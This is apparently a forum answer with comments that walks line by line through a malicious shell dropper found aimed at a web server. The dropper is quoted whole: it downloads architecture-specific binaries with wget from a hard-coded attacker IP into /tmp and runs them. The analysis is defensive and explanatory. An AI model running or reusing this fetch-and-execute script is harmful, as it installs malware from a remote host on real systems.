Line by line:
#!/bin/sh
Establishes the sh
shell, whichever that is, as the shebang line. sh%20/tmp/ks
in the request overrides this, so this line is treated as a normal comment and ignored.
u="asgknskjdgn"
Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp
, but maybe that is not available on all platforms.
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
Enumerates several common CPU architectures.
http_server="80.211.173.159"
http_port=80
The server which has the exploit.
cd /tmp/||cd /var/
Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.
for name in $bin_names
do
For each CPU architecture…
rm -rf $u
Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.
cp $SHELL $u
Copies the current shell executable (/bin/sh
). Can be ignored because of the line after next.
chmod 777 $u
Makes everyone have full access to the new file. This should have been after the wget
command, which is either a sign of a shell scripting newbie or a misdirection technique.
>$u
Empties out the file. Pointless because of the next line.
wget http://$http_server:$http_port/$name -O -> $u
Overwrites the file with the exploit script for this architecture. -O -> $u
could have been written -O - > $u
(the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u
.
./$u $name
Runs the exploit script with the architecture as the first argument.
done
Ends the loop.
It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u
three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.
4
Related vulnerability: https://twitter.com/txalin/status/1007625620090707974?lang=en
– user2064000 – 2018-09-08T18:58:33.5571How did that script get on your server in the first place? – MrWhite – 2018-09-09T01:06:09.650
3I just open the .sh file in a browser on my home pc and copy and pasted it in here, it never actually got on my server. – ndom91 – 2018-09-09T06:26:35.907
1This script is a 'dropper', which is used to download the actual exploit script. This will be located at
hxxp://80.211.173.159:80/$name
where$name
is each of the CPU architectures inbin_names
. So 7 attack scripts will be downloaded and executed – BlueCacti – 2018-09-10T10:08:21.943